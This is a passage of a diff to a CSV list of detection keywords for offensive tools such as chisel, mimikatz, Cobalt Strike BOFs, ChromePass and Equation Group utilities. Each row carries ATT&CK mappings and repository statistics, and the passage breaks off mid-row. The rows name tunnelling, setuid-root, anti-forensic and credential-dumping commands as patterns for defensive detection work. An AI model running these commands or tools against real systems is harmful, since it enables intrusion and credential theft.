+"*chisel -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel client -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel client http*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel server -*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*chisel.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*chisel.exe client*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel.exe server*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel.jpillora.com*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_1*_darwin_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_1*_linux_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_linux_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel_windows_amd64.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*chisel-master.zip*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe client*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.exe server*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel.jpillora.com*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_darwin_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_1*_linux_*.gz*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_linux_amd64*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel_windows_amd64.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*chisel-master.zip*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "*chknull.zip*","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*chmod +x dirty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*chmod 666 /var/run/utmp~*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*chmod 700 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*chmod 700 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*chmod 700 nscd crond*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z" -"*chmod 755 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*choco install * common.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*chocobo_root.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*chocolate.kirbi*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*chmod 755 lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*choco install * common.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*chocobo_root.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*chocolate.kirbi*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Choosing DLL to hijack.*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*chown root %s chmod 4755 %s %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chrismaddalena/SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*chrispetrou/HRShell*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*chrome_creds.txt*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*chromecertbeggar.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*chromecertbeggar2.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*chromecertbeggar.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*chromecertbeggar2.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*ChromeDump.git*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*chromedump.py*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*ChromeDump-main.zip*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" -"*chromeKey.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*chromeKey.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromeKey.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromeKey.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*chromepass.exe*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chromepass.zip*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chromiumkeydump *","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" @@ -8449,46 +8597,46 @@ "*ChromiumKeyDump.cpp*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.exe*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*Chudry/Xerror*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*chunlie.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*chvancooten/nimbuild*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*chvancooten/NimPlant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*chunlie.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 